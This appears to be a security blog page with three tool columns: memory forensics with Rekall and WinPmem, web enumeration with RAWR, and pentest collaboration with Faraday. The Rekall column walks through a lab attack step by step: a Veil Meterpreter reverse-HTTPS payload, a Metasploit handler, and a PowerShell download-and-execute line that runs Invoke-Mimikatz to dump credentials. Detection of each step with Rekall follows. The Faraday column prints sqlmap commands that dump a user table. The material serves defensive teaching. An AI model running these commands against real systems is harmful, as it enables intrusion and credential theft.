Friday, May 01, 2015

toolsmith: Attack & Detection: Hunting in-memory adversaries with Rekall and WinPmem

Prerequisites
Any Python-enable system if running from source
There is a standalone exe with all dependencies met, available for Windows

Introduction

This month represents our annual infosec tools edition, and I’ve got a full scenario queued up for you. We’re running with a vignette based in absolute reality. When your organizations are attacked (you already have been) and a compromise occurs (assume it will) it may well follow a script (pun intended) something like this. The most important lesson to be learned here is how to assess attacks of this nature, recognizing that little or none of the following activity will occur on the file system, instead running in memory. When we covered Volatility in September 2011 we invited readers to embrace memory analysis as an absolutely critical capability for incident responders and forensic analysts. This month, in a similar vein, we’ll explore Rekall. The project’s point man, Michael Cohen branched Volatility, aka the scudette branch, in December 2011, as a Technology Preview. In December 2013, it was completely forked and became Rekall to allow inclusion in GRR as well as methods for memory acquisition, and to advance the state of the art in memory analysis. The 2nd of April, 2015, saw the release of Rekall 1.3.1 Dammastock, named for Dammastock Mountain in the Swiss Alps. An update release to 1.3.2 was posted to Github 26 APR 2015.
Michael provided personal insight into his process and philosophy, which I’ll share verbatim in part here:
For me memory analysis is such an exciting field. As a field it is wedged between so many other disciplines - such as reverse engineering, operating systems, data structures and algorithms. Rekall as a framework requires expertise in all these fields and more. It is exciting for me to put memory analysis to use in new ways. When we first started experimenting with live analysis I was surprised how reliable and stable this was. No need to take and manage large memory images all the time. The best part was that we could just run remote analysis for triage using a tool like GRR - so now we could run the analysis not on one machine at the time but several thousand at a time! Then, when we added virtual machine introspection support we could run memory analysis on the VM guest from outside without any special support in the hypervisor - and it just worked!
While we won’t cover GRR here, recognize that the ability to conduct live memory analysis across thousands of machines, physical or virtual, without impacting stability on target systems is a massive boon for datacenter and cloud operators.

Scenario Overview

We start with the assertion that the red team’s attack graph is the blue team’s kill chain.
Per Captain Obvious: The better defenders (blue team) understand attacker methods (red team) the more able they are to defend against them. Conversely, red teamers who are aware of blue team detection and analysis tactics, the more readily they can evade them.
As we peel back this scenario, we’ll explore both sides of the fight; I’ll walk you through the entire process including attack and detection. I’ll evade and exfiltrate, then detect and define.
As you might imagine the attack starts with a targeted phishing attack. We won’t linger here, you’ve all seen the like. The key take away for red and blue, the more enticing the lure, the more numerous the bites. Surveys promising rewards are particularly successful, everyone wants to “win” something, and sadly, many are willing to click and execute payloads to achieve their goal. These folks are the red team’s best friend and the blue team’s bane. Once the payload is delivered and executed for an initial foothold, the focus moves to escalation of privilege if necessary and acquisition of artifacts for pivoting and exploration of key terrain. With the right artifacts (credentials, hashes), causing effect becomes trivial, and often leads to total compromise. For this exercise, we’ll assume we’ve compromised a user who is running their system with administrative privileges, which sadly remains all too common. With some great PowerShell and the omniscient and almighty Mimikatz, the victim’s network can be your playground. I’ll show you how.

ATTACK

Keep in mind, I’m going into some detail here regarding attack methods so we can then play them back from the defender’s perspective with Rekall, WinPmem, and VolDiff.

Veil
All good phishing attacks need a great payload, and one of the best ways to ensure you deliver one is Christopher Truncer’s (@ChrisTruncer) Veil-Evasion, part of the Veil-Framework. The most important aspect of Veil use is creating payload that evade antimalware detection. This limits attack awareness for the monitoring and incident response teams as no initial alerts are generated. While the payload does land on the victim’s file system, it’s not likely to end up quarantined or deleted, happily delivering its expected functionality.
I installed Veil-Evasion on my Kali VM easily:
1)      apt-get install veil
2)      cd /usr/share/veil-evasion/setup
3)      ./setup.sh
Thereafter, to run Veil you need only execute veil-evasion.
Veil includes 35 payloads at present, choose list to review them.
I chose 17) powershell/meterpreter/rev_https as seen in Figure 1.

Figure 1 – Veil payload options
I ran set LHOST 192.168.177.130 for my Kali server acting as the payload handler, followed by info to confirm, and generate to create the payload. I named the payload toolsmith, which Veil saved as toolsmith.bat. If you happened to view the .bat file in a text editor you’d see nothing other than what appears to be a reasonably innocuous PowerShell script with a large Base64 string. Many a responder would potentially roll right past the file as part of normal PowerShell administration. In a real-world penetration test, this would be the payload delivered via spear phishing, ideally to personnel known to have privileged access to key terrain.

Metasploit
This step assumes our victim has executed our payload in a time period of our choosing. Obviously set up your handlers before sending your phishing mail. I will not discuss persistence here for brevity’s sake but imagine that an attacker will take steps to ensure continued access. Read Fishnet Security’s How-To: Post-ExPersistence Scripting with PowerSploit & Veil as a great primer on these methods.
Again, on my Kali system I set up a handler for the shell access created by the Veil payload.
1)      cd /opt/metasploit/app/
2)      msfconsole
3)      use exploit/multi/handler
4)      set payload windows/meterpreter/reverse_https
5)      set lhost 192.168.177.130
6)      set lport 8443
7)      set exitonsession false
8)      run exploit –j
At this point back returns you to the root msf > prompt.
When the victim executes toolsmith.bat, the handler reacts with a Meterpreter session as seen in Figure 2.

Figure 2 – Victim Meterpreter session
Use sessions –l to list sessions available, use sessions -i 2 to use the session seen in Figure 2.
I know have an interactive shell with the victim system and have some options. As I’m trying to exemplify running almost entirely in victim memory, I opted to not to copy additional scripts to the victim, but if I did so it would be another PowerShell script to make use of Joe Bialek’s (@JosephBialek) Invoke-Mimikatz, which leverages Benjamin Delpy’s (@gentilkiwi) Mimikatz. Instead I pulled down Joe’s script directly from Github and ran it directly in memory, no file system attributes.
From the MSF console, I first ran spool /root/meterpreter_output.txt.
Then via the Meterpreter session, I executed the following.
1) getsystem (if the user is running as admin you’ll see “got system”)
2) shell
3) powershell.exe "iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
A brief explanation here. The shell command spawns a command prompt on the victim system, getsystem ensures that you’re running as local system (NT AUTHORITY\SYSTEM) which is important when you’re using Joe’s script to leverage Mimikatz 2.0 along with Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. Again our goal here is to conduct activity such as dumping credentials without ever writing the Mimikatz binary to the victim file system. Our last line does so in an even craftier manner. To prevent the need to write out put to the victim file system I used the spool command to write all content back to a text file on my Kali system. I used PowerShell’s ability to read in Joe’s script directly from Github into memory and poach credentials accordingly. Back on my Kali system a review of /root/meterpreter_output.txt confirms the win. Figure 3 displays the results.

Figure 3 – Invoke-Mimikatz for the win!
If I had pivoted from this system and moved to a heavily used system such as a terminal server or an Exchange server, I may have acquired domain admin credentials as well. I’d certainly have acquired local admin credentials, and no one ever uses the same local admin credentials across multiple systems, right? ;-)
Remember, all this, with the exception of a fairly innocent looking initial payload, toolsmith.bat, took place in memory. How do we spot such behavior and defend against it? Time for Rekall and WinPmem, because they “can remember it for you wholesale!”

DEFENSE

Rekall preparation

Installing Rekall on Windows is as easy as grabbing the installer from Github, 1.3.2 as this is written.
On x64 systems it will install to C:\Program Files\Rekall, you can add this to your PATH so you can run Rekall from anywhere.

WinPmem

WinPmem 1.6.2 is the current stable version and WinPmem 2.0 Alpha is the development release. Both are included on the project Github site. Having an imager embedded with the project is a major benefit, and it’s developed against with a passion.
Running WinPmem for live response is as simple as winpmem.exe –l to load the driver so you launch Rekall to mount the winpmem device with rekal -f \\.\pmem (this cannot be changed) for live memory analysis.

Rekall use

There are a few ways to go about using Rekall. You can take a full memory image, locally with WinPmem, or remotely with GRR, and bring the image back to your analysis workstation. You can also interact with memory on the victim system in real-time live response, which is what differentiates Rekall from Volatility. On the Windows 7 x64 system I compromised with the attack described above I first ran winpmem_1.6.2.exe compromised.raw and shipped the 4GB memory image to my workstation. You can simply run rekal which will drop you into the interactive shell. As an example I ran, rekal –f D:\forensics\memoryImages\toolsmith\compromised.raw, then from the shell ran various plugins. Alternatively I could have run rekal –f D:\forensics\memoryImages\toolsmith\compromised.raw netstat at a standard command prompt for the same results. The interactive shell is the “most powerful and flexible interface” most importantly because it allows session management and storage specific to an image analysis.

Suspicious Indicator #1
From the interactive shell I started with the netstat plugin, as I always do. Might as well see who it talking to who, yes? We’re treated to the instant results seen in Figure 4.

Figure 4 – Rekall netstat plugin shows PowerShell with connections
Yep, sure enough we see a connection to our above mention attacker at 192.168.177.130, the “owner” is attributed to powershell.exe and the PIDs are 1284 and 2396.

Suspicious Indicator #2
With the pstree plugin we can determine the parent PIDs (PPID) for the PowerShell processes. What’s odd here from a defender’s perspective is that each PowerShell process seen in the pstree (Figure 5) is spawned from cmd.exe. While not at all conclusive, it is at least intriguing.


Figure 5 – Rekall pstree plugin shows powershell.exe PPIDs
Suspicious Indicator #3
I used malfind to find hidden or injected code/DLLs and dump the results to a directory I was scanning with an AV engine. With malfind pid=1284, dump_dir="/tmp/" I received feedback on PID 1284 (repeated for 2396), with indications specific to Trojan:Win32/Swrort.A. From the MMPC write-upTrojan:Win32/Swrort.A is a detection for files that try to connect to a remote server. Once connected, an attacker can perform malicious routines such as downloading other files. They can be installed from a malicious site or used as payloads of exploit files. Once executed, Trojan:Win32/Swrort.A may connect to a remote server using different port numbers.” Hmm, sound familiar from the attack scenario above? ;-) Note that the netstat plugin found that powershell.exe was connecting via 8443 (a “different” port number).     

Suspicious Indicator #4
To close the loop on this analysis, I used memdump for a few key reasons. This plugin dumps all addressable memory in a process, enumerates the process page tables and writes them out into an external file, creates an index file useful for finding the related virtual address. I did so with memdump pid=2396, dump_dir="/tmp/", ditto for PID 1284. You can use the .dmp output to scan for malware signatures or other patterns. One such method is strings keyword searches. Given that we are responding to what we can reasonably assert is an attack via PowerShell a keyword-based string search is definitely in order. I used my favorite context-driven strings tool and searched for invoke against powershell.exe_2396.dmp. The results paid immediate dividends, I’ve combined to critical matches in Figure 6.

Figure 6 – Strings results for keyword search from memdump output
Suspicions confirmed, this box be owned, aargh!
The strings results on the left show the initial execution of the PowerShell payload, most notably including the Hidden attribute and the Bypass execution policy followed by a slew of Base64 that is the powershell/meterpreter/rev_https payload. The strings results on the left show when Invoke-Mimikatz.ps1 was actually executed.
Four quick steps with Rekall and we’ve, in essence, reversed the steps described in the attack phase.
Remember too, we could just as easily have conducted these same step on a live victim system with the same plugins via the following:
rekal -f \\.\pmem netstat
rekal -f \\.\pmem pstree
rekal -f \\.\pmem malfind pid=1284, dump_dir="/tmp/"
rekal -f \\.\pmem memdump pid=2396, dump_dir="/tmp/"

In Conclusion

In celebration of the annual infosec tools addition, we’ve definitely gone a bit hog wild, but because it has been for me, I have to imagine you’ll find this level of process and detail useful. Michael and team have done wonderful work with Rekall and WinPmem. I’d love to hear your feedback on your usage, particularly with regard to close, cooperative efforts between your red and blue teams. If you’re not yet using these tools yet, you should be, and I recommend a long, hard look at GRR as well. I’d also like to give more credit where it’s due. In addition to Michael Cohen, other tools and tactics here were developed and shared by people who deserve recognition. They include Microsoft’s Mike Fanning, root9b’s Travis Lee (@eelsivart), and Laconicly’s Billy Rios (@xssniper). Thank you for everything, gentlemen.
Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next month.

Acknowledgements

Michael Cohen, Rekall/GRR developer and project lead (@scudette)

Wednesday, April 01, 2015

toolsmith: Rapid Assessment of Web Resources (RAWR!)

In memory and honor of Leonard Nimoy (1931-2015): “Of all the souls I have encountered in my travels, his was the most... human.”

Prerequisites
Typically *nix, tested here on Ubuntu & Kali
Kali and Ubuntu recommended, virtual machine or physical

Overview

Confession, and it shouldn’t be a shocker: I’m a huge military science fiction fan. As such, John Ringo is one of my absolute favorites. I’m in the midst of his Black Tide Rising campaign, specifically Book 2, To Sail a Darkling Sea. As we contemplate this month’s ISSA Journal topic, Security Architecture/Security Management, let’s build a bit on this theme of dark seas as we look out at our probable futures. Keren Elazari (she is speaking at RSA 2015, where you may well be reading this in print), in her April 2015 Scientific American article, How To Survive Cyberwar, states that “in the coming years, cyberattacks will almost certainly intensify, and that is a problem for all of us. Now that everyone is connected in some way to cyberspace - through our phones, our laptops, our corporate networks – we are all vulnerable.” If you haven’t caught up with this perspective yet, wake up. I’m a Premera customer, you with me? Ringo starts Chapter 1 of To Sail a Darkling Sea with Sir Edmund Burke: “When bad men combine, the good must associate; else they will fall, one by one, an unpitied sacrifice in a contemptible struggle.
You’ll therefore forgive me if I stay on a bit of a pentesting & assessment run having just covered Faraday last month, but it’s for good reason. While unable to be specific, I can tell you that, at multiple intervals in the last few of months, I have seen penetration testing and the brilliant testers executing them, provide extraordinary value for their “customers”. One way to try and avoid sailing the darkling, compromised seas of the Intarwebs is with a robust penetration testing program, as integral to security management as any governance, risk, and compliance program. Bad men combine, we know that; the good must pentest. J
Let’s put philosophy into action this month with Adam Byers’ RAWR (NJ Ouchn, our friend @toolswatch, is on the RAWR team too). I asked Adam for the typical tool author’s contribution to the column and was treated to such robust content that I’m going to take a slightly different approach this month we’re I’ll weave in Adam’s feedback throughout as we take RAWR on a walkabout. For a proper introduction per Adam: "RAWR was designed to ease the process of the mapping, discovery, and reporting phases of an assessment with a focus primarily on web resources. It was built to be quick, scalable, and productive for the assessor. From the ground up, it accepts input from multiple different known scanning solutions, as well as leveraging NMap if no pre-existing scan data is available.  The goal of RAWR is to consolidate and capture the pieces of information that are most useful while performing a web assessment, and produce output that is normalized and functional.  There are many common checks performed in the process of a web assessment, each yielding information that is useful. The problem is that there are many different tools capable of gathering these singular bits of data, and each one produces output unlike the last. This further complicates the job that the assessor is tasked to perform, because producing a report that effectively compiles all of this information is the end goal.  With RAWR we want to take any type of relevant input, perform enumeration, and effectively pass the data on to the next phase - whether that phase be a tool, a person, or the end report itself.”
If you’ve conducted an assessment at any time, unless you’re working for one of those cookie cutter, CEH-certified checklist compliance mills, you’ve run into the issue of many different tools gathering data but generating output unlike the last. Outstanding efforts such as RAWR contribute greatly to the collaborate, combine, and complete cause, resulting in improved results and happier customers.
Adam also indicated that in addition to assessments, RAWR is useful during audits. Its ability to capture artifacts such as screenshots of disclaimer statements and login banners drastically reduces the amount of time it takes to complete audit tasks. The RAWR roadmap includes full header specification (including cookies), email/SMS notifications (already in the dev branch), better DNS functionality, and the acceptance of new input formats. The RAWR development pipeline also includes database integration for comparison and differential analysis of historical scan data via a PostgreSQL database, allowing trending as an example.
With that in mind, let’s begin our exploration.

Ready RAWR!



Some quick installation and setup notes. I initially installed RAWR on Kali but received rather buggy and incomplete results. Suspecting more of a Kali libs issue versus a RAWR shortcoming, I moved to an Ubuntu instance and received far better results.
At an Ubuntu terminal prompt, I executed:
cd rawr
sudo ./install.sh
The RAWR installer will help acquire dependencies including Ghost or phantomJS, python-lxml for parsing XML and HTML, and python-pygraphviz to create PNG diagrams from a site crawl. You’ll be asked to confirm for installation of missing dependencies; on Kali nmap is native, but phantomJS, DPE (from @toolswatch), and others will need to be installed. If you end up with pygraphviz errors on Ubuntu you may need to force installation with sudo apt-get install python-pygraphviz then run ./install.sh -u.

Run RAWR!

Adam provided us details for a typical assessment with RAWR, we’ll follow his steps and provide results as we go along.

Adam: A typical assessment begins with performing enumeration with RAWR. Executing something like rawr -a -o -r -x -S3 --dns gives us quite a bit of information to work with.

toolsmith: I ran ./rawr.py holisticinfosec.org -p fuzzdb -a -o -r -x -S3 –ssl --dns. To use FuzzDB Common Ports, I set -p fuzzdb. The -a switch is used to include all open ports in the CSV output and the Threat Matrix. The –o switch grabs HTTP OPTIONS, -r acquires robots.txt, and –x pulls down crossdomain.xml. The -S3 flag controls crawl intensity, 3 is default, --ssl tells nmap to call enum-ciphers.nse for more in-depth SSL data, and --dns queries Bing for other hostnames and adds them to the queue. Results are written to a log directory, specifically /rawr/log_20150321-143627_rawr on my Ubuntu instance. Therein, a cornucopia of useful results abound.
Adam: The Attack Surface (Threat) Matrix provides a quick view of ports on hosts; as well as patterns that reveal clustered services, similar host configurations, HA setups, and potential firewalls.

toolsmith: As seen in Figure 1, my Threat Matrix does not offer much to be concerned about, just 80 and 443 listening.

Figure 1 – RAWR Threat Matrix results

Adam: We can take serverinfo.csv and use it as a checklist, notating any interesting hosts and possible vulnerabilities.  Because we specified '-a' in the command line, all port data is included in the output regardless of whether or not it is web based.

toolsmith: The server information feature returns results for url, ipv4, port, returncode, hostnames, title, robots, script, file_includes, ssl_cert-daysleft, ssl_cert-validityperiod, ssl_cert-md5, ssl_cert-sha-1, ssl_cert-notbefore, ssl_cert-notafter, cpe, cve, service_version, server, endurl, date, content-type, description, author, revised, docs, passwordfields, email_addresses, html5, comments, defpass, and diagram. As seen in Figure 2, my serverinfo.csv provides a sample of such details.

Figure 2 – RAWR server information
Adam: The ‘index’ HTML report provides a dynamic (jQuery-driven) way to sift through screenshots and information captured from each host. While performing a site spider, RAWR pulls meta data from any docs found, which usually hands us a list of usernames, email addresses, domains, server names, phone numbers, and more in an HTML format, linked to in the index report. Also available via the index is a report that addresses the security headers of the target scope, alerting the assessor of improperly configured web sites and services.

toolsmith: I’ll share the results of each of the three succinct reports generated. Figure 3 represents the initial index report.

Figure 3 – RAWR Index Report
Figure 4 indicates the Nmap results.

Figure 4 – RAWR Nmap Scan Report
Figure 5 displays the security headers report. This report includes definitions from https://securityheaders.com to provide clarity.

Figure 5 – RAWR Security Headers Report
Figure 6 provides the results of the metadata extracted during the RAWR scan.

Figure 6 – RAWR Metadata Report
Adam: For web-focused testing, we also use the '--proxy' switch to push all of the traffic through Portswigger’s BurpSuite or OWASP Zed Attack Proxy.  RAWR isn't a vulnerability scanner, so it's helpful to leverage an interception proxy for further scans and session data when we go hunting.  Most IDS/IPS configurations will not alert on any of RAWR's activity aside from the initial NMap scan, as every request is a valid HTTP call to a verified host.

toolsmith: I ran RAWR separately through Burp with the --proxy switch enabled, this is a fabulous way to build an initial footprint, then proceed with more aggressive web application security testing. You can customize your RAWR scans via /rawr/conf/settings.py, including the user-agent (useful when you want to be uniquely identified during assessments), Nmap speed, CSV settings, spider aggression, and default ports.  
Keep in mind, you should only be using RAWR against resources you are authorized to assess.

In Conclusion

Adam reminds us that no one tool does it all and that it would be great to see more integration and data synchronicity between different tool sets. RAWR developers seek to overcome this by facilitating its acceptance of multiple input formats, as well as outputs like JSON, CSV, ShelvDB, and the aforementioned planned PostgreSQL integration.  There are also word lists for hydra and input lists for NMap; as well as other lists with Dirbuster, Nikto, and MetaSploit in mind. As information security tools developers work to build tools that are modular and scalable, so too should they consider making them compatible. Great work here by Adam and team, I really look forward to continued RAWR development and the principles it aligns with. A bright beacon in the darkling sea, if you will.
Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next month.

Acknowledgements

Adam Byers (@al14s), RAWR (@RapidWebEnum) project lead
Tom Moore (@c0ncealed)

Tuesday, March 03, 2015

toolsmith: Faraday IPE - When Tinfoil Won’t Work for Pentesting



Prerequisites
Typically *nix, tested on Debian, Ubuntu, Kali, etc.
Kali 1.1.0 recommended, virtual machine or physical


Overview
I love me some tinfoil-hat-wearing conspiracy theorists, nothing better than sparking up a lively conversation with a “Hey man, what was that helicopter doing over your house?” and you’re off to the races. Me, I just operate on the premise that everyone is out to get me and I’m good to go. For the more scientific amongst you, there’s always a Faraday option. What? You don’t have a Faraday Cage in your house? You’re going to need more tinfoil. :-)

Figure 1 – Tinfoil coupon

In all seriousness, Faraday, in the toolsmith context, is an Integrated Penetration-Test Environment (IPE); think of it as an IDE for penetration testing designed for distribution, indexation, and analysis of the generated data during the process of a security audit (pentest) conducted with multiple users. It was some years ago when we discussed them in toolsmith, but Raphael Mudge’s Armitage is a similar concept for Metasploit, while Dradis provides information sharing for pentest teams
Faraday now includes plugin support for over 40 tools, including some toolsmith topics and favorites such as Openvas, BeEF Arachni, Skipfish, and ZAP.
The Faraday project offers a robust wiki and a number of demo videos you should watch as well.
I pinged Federico Kirschbaum, Infobyte’s CTO and project lead for Faraday.
He stated that, as learned from doing security assessments, they always had the need to know what the results were from the tests performed by other team members. Sharing partial knowledge of target systems proved to be useful not only to avoid overlapping but also to reuse discoveries and build a complete picture. During penetration tests where the scope is quite large, it is common that a vulnerability detected in one part of the network can be exploited somewhere else as well. Faraday’s purpose is to aid security professionals and its development is driven by this desire to truly convert penetration testing into a community experience.
Federico also described their goal to provide an environment where all the data generated during a pentest can be transformed into meaningful, indexed information. Results can then be easily distributed between team members in real time without the need to change workflow or tools, allowing them to benefit from the shared knowledge. Pentesters use a lot of tools on a daily basis, and everybody has a "favorite" toolset, ranging from full blown vulnerability scanners to in-house tools; instead of trying to change the way people like to work the team designed Faraday as a bridge that allows tools to work in a collaborative way. Faraday's plug-in engine currently supports more than 40 well known tools and also provides an easy-to-use API to support custom tools.
Information persisted in Faraday can be queried, filtered, and exported to feed other tools. As an example, one could extract all hosts discovered running SSH in order to perform mass brute force attacks or see which commands or tools have been executed.
Federico pointed out that Faraday wasn't built thinking only about pentesters. Project managers can also benefit from a central database containing several assessments at once while being able to easily see the progress of their teams and have the ability to export information to send status reports.
It was surprising to the Infobytes team that many of the companies that use Faraday today are pentest clients rather than the actual pentest consultant. This is further indication of why it is always useful to have a repository of penetration test results whether they be internal or through outside vendors.
Faraday comes in three flavors - Community, Professional and Corporate. All of the features mentioned above are available in our Community version, which is Open Source. I tested Community for this effort as it is free.
Federico, in closing, pointed out that one of the main features in the commercial version is the ability to export reports for MS Word containing all the vulnerabilities, graphs, and progress status. This makes reporting, a pentester’s bane (painful, uncomfortable, unnatural even), into a one-click operation that can be executed by any team member at any time. See the product comparison page for more features and details for versions, based on your budget and needs.

Faraday preparation

The easiest way to run Faraday, in my opinion, is from Kali. This is a good time to mention that Kali 1.1.0 is available as of 9 FEB 2015, if you haven’t yet upgraded, I recommend doing so soon.
At the Kali terminal prompt, execute:
git clone https://github.com/infobyte/faraday.git faraday-dev
cd faraday-dev
./install.sh
The installer will download and install dependencies, but you’ll need to tweak CouchDB to make use of the beautiful HTML5 reporting interface. Use vim or Leafpad to edit /etc/couchdb/local.ini and uncomment (remove semicolon) for port and bind_address on lines 11 and 12. You may want to use the Kali instances IP address, rather than the loopback address to allow remote connections (other users). You can also change the port to your liking. Then restart the CouchDB service with service couchdb restart. You can manipulate SSL and authentication mechanisms in local.ini as well. Now issue ./faraday.py -d. I recommend running with –d as it gives you all the debug content in the logging console. The service will start, the QT GUI will spawn, and if all goes well, you’ll receive an INFO message telling you where to point your browser for the CouchDB reporting interface. Note that there are limitations specific to reporting in the Community version as compared to its commercial peers.

Figure 2 – Initial Faraday GUI QT
Fragging with Faraday

The first thing you should do in the Faraday UI is create a workspace: Workspace | Create. Be sure to save it as CouchDB as opposed to FS. I didn’t enable replication as I worked alone for this assessment.
Shockingly, I named mine toolsmith. Explore the plugins available thereafter with either Tools | Plugin or use the Plugin button, fourth from the right on the toolbar. I started my assessment exercise against a vulnerable virtual machine (192.168.255.131) with a quick ping and nmap via the Faraday shell (Figure 3). To ensure the default visualizations for Top Services and Top Host populated in the Faraday Dashboard, I also scanned a couple of my gateways.

Figure 3 – Preliminary Faraday results
As we can see in Figure 3, our target host is appears to be listening on port 80, indicating a web server, and a great time to utilize a web application scanner. Some tools such as the commercial Burpsuite Pro have a Faraday plugin for direct integration, you can still make use free Burpsuite data, as well as results from the likes of free and fabulous OWASP ZAP. To so, conduct a scan and save the results as XML to the applicable workspace directory, ~/.faraday/report/toolsmith in my case. The results become evident when you right-click the target host in the Host Tree as seen in Figure 4.

Figure 4 – Faraday incorporates OWASP ZAP results
We can see as we scroll through findings we’ve discovered a SQL injection vulnerability; no better time to use sqlmap, also supported by Faraday. Via the Faraday shell I ran the following, based on my understanding of the target apps discovered with ZAP.
To enumerate the databases:
sqlmap -u 'http://192.168.255.134/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' –dbs
To enumerate the tables present in the Joomla database:
sqlmap -u 'http://192.168.255.134/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D joomla –tables
To dump the users from the Joomla database:
sqlmap -u 'http://192.168.255.134/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' --dump  -D joomla -T j25_users
Unfortunately, late in the game as this was being written, we discovered a change in sqlmap behavior that cause some misses for the Faraday sqlmap plugin, preventing sqlmap data from being populated in the CouchDB and thus the Faraday host tree. Federico immediately noted the issue was issuing a patch as I was writing; by the time you read this you’ll likely be working with an updated version. I love sqlmap so much though and wanted you to see the Faraday integration. Figure 5 gives you a general sense of the Faraday GUI accommodating all this sqlmap mayhem.

Figure 5 – Faraday shell and sqlmap
That being said, here’s where all the real Faraday superpowers kick in. You’ve enumerated, assessed, and even exploited, now to see some truly beautified HTML5 results. Per Figure 6, the Faraday Dashboard is literally one of the most attractive I’ve ever seen and includes different workspace views, hover-over functionality and host drilldown.

Figure 6 – Faraday Dashboard
There’s also the status report view which really should speak for itself but allows you really flexible filtering as seen in Figure7.

Figure 7 – Faraday Status
Those pentesters and pentest PMs who are looking for a data management solution should now be fully inspired to check out Faraday in its various versions and support levels. It’s an exciting tool for a critical cause.

In Conclusion

Faraday is a project that benefits from your feedback, feature suggestions, bug reports, and general support. They’re an engaged team with a uniquely specialized approach to problem solving for the red team cause, and I look forward to future releases and updates. I know more than one penetration testing team to whom I will strongly suggest Faraday consideration.
Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next month.

Acknowledgements

Federico Kirschbaum (@fede_k), Faraday (@faradaysec) project lead, CTO Infobyte LLC (@infobytesec